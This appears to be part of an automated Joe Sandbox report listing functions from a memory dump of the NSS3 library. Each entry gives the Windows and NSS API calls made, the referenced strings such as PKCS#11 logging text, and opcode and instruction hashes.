                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35ff916f43800d44740750d6f16ca7d506e8e9b4bced9b61d5cf2e6d64bf0eaf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B97158B6900618BBCB24EBE0DD49FDE7779AF88304F004599F60997181EA78DB94CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 786543732-0
                                                                                                                                                                                                                              • Opcode ID: e28c42d2717c5dd7c31d37d476d9735daf205766fa1040fd4ad8dbe7f6c94b25
                                                                                                                                                                                                                              • Instruction ID: 1151034fbf6f3a011a49ec7a2aa317537ebeeb7ab214b20d16c8a5c4f242ea0b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e28c42d2717c5dd7c31d37d476d9735daf205766fa1040fd4ad8dbe7f6c94b25
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A951CEB1A002178BEB00DF98DC40AAF77B8AB16348F14C135D914A3B10EB32E916CBD6
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C98ADE6
                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C98AE17
                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C98AE29
                                                                                                                                                                                                                                • Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C98AE3F
                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C98AE78
                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C98AE8A
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C98AEA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                              • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                                                                                                                                                              • API String ID: 332880674-605059067
                                                                                                                                                                                                                              • Opcode ID: a1f21d8e3fd179aae89ac819808e3481aac62e2786f48768a296e21a5d96b502
                                                                                                                                                                                                                              • Instruction ID: 5c346b954767931393869bf2e099b7f1d33d2f1019140e746e4a4c5e624d0dca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1f21d8e3fd179aae89ac819808e3481aac62e2786f48768a296e21a5d96b502
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D312B76602205AFCB048F54ED48FAA3775BB5130DF048C25E4096BB92DF34D849CBB5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CA24CAF
                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA24CFD
                                                                                                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6CA24D44
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                              • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                              • Opcode ID: e66c79a49fb5326b7fabc94a61a0f08149daa8e655cb9bb2bfc59352c188ea16
                                                                                                                                                                                                                              • Instruction ID: 9b9abe96b142ab07b0a8398788bf258f856b8086dc4df9d63ff081105472ca62
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e66c79a49fb5326b7fabc94a61a0f08149daa8e655cb9bb2bfc59352c188ea16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B317A73F09A32A7D70C4A2CA8007A577327B82318F1D4129D8254BF54C7ACECD287E2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_InitPIN), ref: 6C982DF6
                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C982E24
                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C982E33
                                                                                                                                                                                                                                • Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C982E49
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C982E68
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C982E81
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                              • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                                                                                                                                                              • API String ID: 1003633598-1777813432
                                                                                                                                                                                                                              • Opcode ID: d7e243d5ebf3779f581eeb3859f3dcc388d9c6a53c467ad5328611103033f501
                                                                                                                                                                                                                              • Instruction ID: 7863aaeb245b30e1fc0a7c934fd2da26ae1bfbe43f6145c321578dabe9073a20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e243d5ebf3779f581eeb3859f3dcc388d9c6a53c467ad5328611103033f501
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D3148B5602605AFCB148F51ED4CB4A7B75FB5231CF048521E809ABB62DB30C88DCBB9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C8F24BA
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C8F250D
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C8F2554
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C8F25A7
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C8F2609
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C8F265F
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C8F26A2
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C8F26F5
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C8F2764
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C8F2898
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C8F28D0
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C8F2948
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C8F299B
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C8F29E2
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C8F2A31
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2801635615-0
                                                                                                                                                                                                                              • Opcode ID: 67bc65c3f78e48389771128ee8eaee216846f6783744f37f4dd3790af733ac3d
                                                                                                                                                                                                                              • Instruction ID: 6b1bef85a6a8491cb29b8de112e9ae839436cb1b50aa0f593f0cc76155073004
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67bc65c3f78e48389771128ee8eaee216846f6783744f37f4dd3790af733ac3d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEF1E031B413568BDB2C9FA1FA9DA6E3770BB07314B18852CD92657610CB3DE843CB96
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(6C973F23,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C62
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C76
                                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C86
                                                                                                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C93
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972CC6
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972CDA
                                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23), ref: 6C972CEA
                                                                                                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?), ref: 6C972CF7
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?), ref: 6C972D4D
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C972D61
                                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?), ref: 6C972D71
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C972D7E
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407AD
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407CD
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C8D204A), ref: 6C9407D6
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C8D204A), ref: 6C9407E4
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,6C8D204A), ref: 6C940864
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C940880
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsSetValue.KERNEL32(00000000,?,?,6C8D204A), ref: 6C9408CB
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408D7
                                                                                                                                                                                                                                • Part of subcall function 6C9407A0: TlsGetValue.KERNEL32(?,?,6C8D204A), ref: 6C9408FB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2446853827-0
                                                                                                                                                                                                                              • Opcode ID: ae2a88f71a183a6b754ef714959efbd313854994c16e93918c9046b0134d7533
                                                                                                                                                                                                                              • Instruction ID: 49d98bcd8ff38dc8a056c9ead0c27d89e0fb92f8db26ee01556f9829fb3999c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2a88f71a183a6b754ef714959efbd313854994c16e93918c9046b0134d7533
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A51F5B6D00606EBEB109F24EC458AA77B8BF2925CB048524ED1897B11F732E965C7E1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4C97
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CB0
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CC9
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D11
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D2A
                                                                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D4A
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D57
                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4D97
                                                                                                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4DBA
                                                                                                                                                                                                                              • PR_WaitCondVar.NSS3 ref: 6C8D4DD4
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4DE6
                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4DEF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3388019835-0
                                                                                                                                                                                                                              • Opcode ID: 4294cfb6b5ec857b2d604bcec93898b456567aa68318db882aa3c429070d35bf
                                                                                                                                                                                                                              • Instruction ID: 1a86797efef51373ef3ba6b2a173a03a54e82ebf1b21611eb72370cef56cc2ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4294cfb6b5ec857b2d604bcec93898b456567aa68318db882aa3c429070d35bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA41A0B1A04716CFCB14AF78D5841A97BF0BF85318F068A69D898DB710E730E895CB85
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C99DE64), ref: 6C99ED0C
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C99ED22
                                                                                                                                                                                                                                • Part of subcall function 6C9AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA818D0,?), ref: 6C9AB095
                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6C99ED4A
                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6C99ED6B
                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C99ED38
                                                                                                                                                                                                                                • Part of subcall function 6C8D4C70: TlsGetValue.KERNEL32(?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4C97
                                                                                                                                                                                                                                • Part of subcall function 6C8D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CB0
                                                                                                                                                                                                                                • Part of subcall function 6C8D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C8D3921,6CAB14E4,6CA1CC70), ref: 6C8D4CC9
                                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C99ED52
                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C99ED83
                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6C99ED95
                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6C99ED9D
                                                                                                                                                                                                                                • Part of subcall function 6C9B64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C9B127C,00000000,00000000,00000000), ref: 6C9B650E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                                              • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                              • Opcode ID: c41ce79526c6f1a517e48b5c544bf99a38dd14f1a94d74345c32829bacaad296
                                                                                                                                                                                                                              • Instruction ID: 21e7ecaeab3166c04d19082076f5b8464b9009831af4eb4f11deb8ef31b2fda1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c41ce79526c6f1a517e48b5c544bf99a38dd14f1a94d74345c32829bacaad296
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8116A759002087BE7105B25AC84BBBB27CBFA260CF090939E80472E60FB35F50CC6E6
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_InitToken), ref: 6C982CEC
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C982D07
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_Now.NSS3 ref: 6CA60A22
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA60A35
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA60A66
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_GetCurrentThread.NSS3 ref: 6CA60A70
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA60A9D
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA60AC8
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_vsmprintf.NSS3(?,?), ref: 6CA60AE8
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: EnterCriticalSection.KERNEL32(?), ref: 6CA60B19
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA60B48
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA60C76
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_LogFlush.NSS3 ref: 6CA60C7E
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C982D22
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60B88
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA60C5D
